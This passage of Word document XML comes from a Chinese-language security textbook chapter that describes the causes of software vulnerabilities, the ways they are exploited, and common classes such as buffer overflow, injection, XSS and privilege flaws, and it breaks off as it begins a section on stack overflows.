        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验证机制不完善：过滤还是拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD8E9E1"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访问验证错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，比如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>身份鉴别薄弱或者缺失</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作授权薄弱或者缺失</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会话管理薄弱或者缺失</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489128F1"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（3）</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>竞争条件（Race Condition）,多线程并发访问破坏事件间的依赖关系引发状态的不一致</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DC74FB"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（4）</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>意外情况处置错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8062FA"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（5）</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>逻辑设计错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。比如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>整数溢出</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，密码找回。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4761E796"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 xml:space="preserve">（6） </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>配置错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞的产生在于系统和应用的配置有误，或是软件安装在错误的地方，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>或是错误的配置参数，或是错误的访问权限，策略错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FE4C5F"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（7）</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>环境错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>没有正确处理好程序运行时环境约束造成的错误。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>比如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作环境限制导致的错误，如因OS语言差异导致的DLL劫持</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>因OS或者编译器缺陷导致的错误，如XcodeGhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>独立运行程序模块之间交互产生的错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>异常处理时的意外结果</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C49B0C"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>非技术因素：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>缺乏软件开发规范，降低软件质量</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>缺乏软件进度控制，为进度降低软件质量</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>缺乏安全测试</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>缺乏安全维护</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不稳定的开发团队</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087D0097"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.1.5 软件漏洞的利用方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8C638B"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szCs w:val="21"/>
        </w:rPr>
        <w:t>根据攻击者所在位置和用户参与分为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD3984D"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（1）本地攻击模式，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击者已经进入目标系统，拥有一定的权限，经常会修改系统的开机启动项、绕过沙箱、内核提权、内网渗透等</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12867C6B"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远程主动攻击模式</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击者通过网络连接目标，利用工具扫描目标，发现漏洞，利用漏洞工具自动植入攻击代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5FE26C"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 xml:space="preserve">（3） </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>远程被动攻击模式</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击者通过网络给目标发送邮件或者超链接，用户打开网页、点击邮件附件或网页中的文档，触发漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157E2300"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.1.6 典型的软件漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231181B5"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典型的软件漏洞有：缓冲区溢出、注入攻击、跨站漏洞、权限漏洞等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A9B3E6" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="422"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>缓冲区溢出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166772C5"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szCs w:val="21"/>
        </w:rPr>
        <w:t>缓冲区通常是用来存储数量事先确定的、有限数据的存储区域。当一个程序试图将比缓冲区容量大的数据存储进缓冲区的时候，就会发生缓冲区溢出。当缓冲区发生溢出时候，多余的数据就会溢出到相邻的内存地址中，重写已分配在该存储空间的原有数据，并且有可能改变执行路径和指令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AABEEB"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szCs w:val="21"/>
        </w:rPr>
        <w:t>缓冲区溢出的产生原因</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>计算机程序体系没有严格区分用户数据和程序控制指令</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>部分编程语言（如C、C++）具有直接访问内存的能力</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>向数据区写入大量数据，可以实现对非数据区域的覆盖</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当这些数据被程序错误地当成代码执行时，就可能会产生各种异常情况，如系统崩溃，数据泄露，甚至使攻击者获取控制权。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466AFE8F" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.注入攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B48ED7"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注入攻击主要包括系统命令注入、脚本注入和SQL注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SQL注入，一般指web应用程序对用户输入数据的合法性没有校验或过滤不严，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在不知情的情况下实现非法操作，以此来实</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息。 总的来说就是，攻击者通过系统正常的输入数据的功能，输入恶意数据，而系统又未作任何的校验，直接信任了用户输入，使得恶意输入改变原本的SQL逻辑或者执行了额外的SQL脚本达，从而造成了SQL注入攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每当接受用户输入的内容并重新显示这些内容时，网站就很容易遭受 JavaScript 注入攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，如果用户输入中包含js代码，且web应用没有进行过滤，js代码很可能被运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D88E3E" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.跨站漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD5CCF2" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>跨站脚本攻击，是指攻击者将恶意脚本代码嵌入Web页面里，当用户浏览该Web页面时，嵌入其中的脚本会被执行，从而达到攻击用户、获取用户信息，甚至获取网站权限的特殊目的。这是一种被动式的攻击方式，因为它常常是将恶 意代码嵌入到正常网页中，然后攻击者需要等待用户 访问该网页从而触发漏洞被利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41243362" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. 权限漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D41DC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权限就是指用户可以访问的资源。系统管理员拥有 所有资源的操作权限，他为每个用户分配相应权限。每个用户都工作在其拥有的相应权限之下，如果用户超越自己所拥有的权限，就很容易引起一些安全性问题</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>很多攻击都是利用一些技术手段以达到提升其用户权限来实施攻击的。访问控制机制上存在的漏洞所带来的安全隐患是相当危险的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788739B3" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76BD8322" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈溢出漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5C99F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简单来讲，栈溢出漏洞就是在较大的缓冲区数据向小数据区复制过程中，由于没有注意小缓冲区的边界，超出了缓冲区空间，从而覆盖掉了相邻的内存区域，引起其它变量或信息的错误，是最常见的内存错误之一。成功的利用栈溢出漏洞可以修改内存中的变量；甚至修改返回地址，执行恶意代码，最终获得主机的控制权。要理解这种攻击方式的细节，首先要了解栈的一些基本知识。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8BD193" w14:textId="35E102E4" w:rsidR="002C1A85" w:rsidRPr="000012A0" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003D7125">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
